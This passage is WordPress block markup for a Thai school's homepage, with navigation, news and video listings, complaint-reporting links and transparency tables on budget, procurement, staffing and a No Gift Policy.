{\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 